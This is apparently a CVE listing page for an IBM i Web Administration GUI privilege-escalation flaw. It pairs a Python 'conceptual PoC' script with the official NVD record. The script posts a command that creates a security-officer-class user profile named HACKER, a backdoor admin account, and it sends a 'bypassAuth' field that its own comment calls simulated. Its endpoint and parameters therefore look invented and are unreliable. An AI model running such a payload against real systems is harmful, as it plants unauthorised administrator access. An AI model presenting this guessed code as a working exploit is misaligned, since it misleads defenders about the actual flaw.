CVE-2026-2311

import requests # Conceptual PoC for CVE-2026-2311 # Target: IBM i Web Administration GUI # Description: Exploits invalid authorization check to execute code with admin privileges. target_host = "https://target-ibm-i-server:2001" vulnerable_endpoint = "/HTTPAdmin/Servlet/AdminConfig" # Attacker session cookie (requires valid high-privilege user login per PR:H) headers = { "Cookie": "WASSESSIONID=attacker_session_cookie_value", "User-Agent": "Mozilla/5.0 (PoC Client)" } # Malicious payload to execute user-controlled code # Example: Changing a user profile or running a CL command data_payload = { "action": "executeCommand", "command": "CRTUSRPRF USRPRF(HACKER) PASSWORD(PWD123) CLASS(*SECOFR)", "bypassAuth": "true" # Simulating the bypass logic } try: response = requests.post(target_host + vulnerable_endpoint, headers=headers, data=data_payload, verify=False) if response.status_code == 200: print("[+] Request sent successfully. Check if command was executed with admin rights.") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-2311", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:25.147", "lastModified": "2026-05-01T19:33:39.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM i 7.6, 7.5, 7.4, 7.3, and 7.2 s vulnerable to privilege escalation caused by an invalid IBM i Web Administration GUI authorization check.  A malicious actor could cause user-controlled code to run with administrator privilege."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:ibm:i:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "BD871157-2BB3-4641-B84E-3EA13D24D35A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:i:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "9A49E8C5-7967-42AE-A787-C533D24A63D7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:i:7.4:*:*:*:*:*:*:*", "matchCriteriaId": "92D03306-B6C9-403E-99A2-CE9D8DC3B482"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:i:7.5:*:*:*:*:*:*:*", "matchCriteriaId": "F7CCB5BF-08EF-472F-A663-5DE270234F10"}, {"vulnerable": true, "criteria": "cpe:2.3:o:ibm:i:7.6:*:*:*:*:*:*:*", "matchCriteriaId": "AFFF96C2-7E0F-4DF9-AF51-3EE357D51095"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7269560", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}